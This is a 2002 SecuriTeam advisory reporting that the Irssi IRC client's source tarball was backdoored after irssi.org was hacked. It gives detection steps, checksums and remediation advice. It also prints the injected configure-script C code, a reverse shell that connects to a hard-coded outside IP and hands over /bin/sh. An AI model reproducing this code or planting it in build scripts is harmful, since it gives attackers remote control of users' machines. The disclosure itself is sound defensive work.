[UNIX] Irssi IRC Found to Contain a Backdoor

From: support@securiteam.com
Date: 05/26/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 26 May 2002 18:27:13 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Irssi IRC Found to Contain a Backdoor
------------------------------------------------------------------------

SUMMARY

The main web site of <http://irssi.org/> Irssi distribution has been
hacked (the hacking occurrence seemed to have happened over two months ago
but has only recently been detected), and the tar ball distribution of the
package has been infected with a backdoor. All users of the IRC client
should either upgrade, or download the latest version from the web site
and confirm the MD5 checksum.

DETAILS

What did the backdoor do? How to get rid of it?
The backdoored configure script spawns a new shell, connects to some
server, and allows full shell access to it. Therefore, it might have done
anything.

At least currently, the server where it connects to does not do anything
automatically. We would guess that it just waits incoming for commands. As
for fixing it, it really depends on what it did, and we do not yet know
that. So possibly, it did not do anything, and you do not need to do
anything, but possibly it ran a rootkit or whatever and you will need to
reinstall your whole system. We would suggest doing that if you have any
doubt.

In any case, you should make sure the process is not running anymore by
killing all your /bin/sh processes, or by rebooting.

How do I know if I'm affected?
The backdoor was only in "configure" the built binary itself is not
backdoored. Here is some ways to figure out if you are affected:
 * If you installed Irssi from binary, you are safe.
 * Debian sources were not backdoored.
 * Nightly source snapshots do not seem to be backdoored.
 * CVS does not seem to be backdoored.
 * irssi-0.8.4.tar.bz2 file was not backdoored, only the .gz one
 * FreeBSD port was not backdoored, as it used the .bz2 file
 * Irssi/SILC client was not backdoored
 * If you let Irssi download the GLib sources from irssi.org, they are
backdoored (the same configure thing as with Irssi)
 * If you still have the sources, check with grep SOCK_STREAM configure.
If it returns any lines, it is backdoored.
 * md5 checksum of originally released irssi-0.8.4.tar.gz is
57bf9d89638be3d377be211f0b0d7049. This is also the one of 0.8.4a.

What exactly was the backdoor?
These lines were found from configure script:
        int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
  /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6667);
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);
/* The GNU C library defines this for functions which it implements
    to always fail with ENOSYS. Some functions are actually named
    something starting with __ and the normal name is an alias. */
        { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL);
}

In addition, the IP just changed yesterday from 209.164.15.215.

ADDITIONAL INFORMATION

The information has been provided by <mailto:martin@webtech.se> Martin
Östlund.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Re: Freesat web site as it died?
    ... David wrote: ... This web site appears to me to be dead! ... Yes I'm getting the web site but no good update of it. ... Most of the retailers web pages I've visited have been via the backdoor. ...
    (uk.tech.digital-tv)
  • Re: ssh and ids
    ... Don't assume the backdoor is going to be listening ... makes an outbound connection to a central server that lets the ... attacker issue commands on the compromised host. ... looking at a connection as a whole versus the ...
    (Focus-IDS)
  • Re: redhat audit
    ... If I were you, I'd replace any and all process monitoring tools, network ... It's rare, but heard of, that rootkits and backdoor systems include ... A much more clever hack is to add simple server capabilities to the ... > Evaluating SSL VPNs' Consider NEOTERIS, chosen as leader by top analysts! ...
    (Security-Basics)
  • Re: network request not supported - source virus??
    ... backdoor in a production environment. ... MCSE, CCEA, Microsoft MVP - Terminal Server ... I'm crossing my fingers. ...
    (microsoft.public.win2000.termserv.apps)
  • Re: Can anyone identify this backdoor?
    ... and finally some html which looks something like this ... Server Information ... hk.exe is a program that exploits a vulnerability in the Win32 API(LPC< ... Can anyone identify this backdoor? ...
    (Incidents)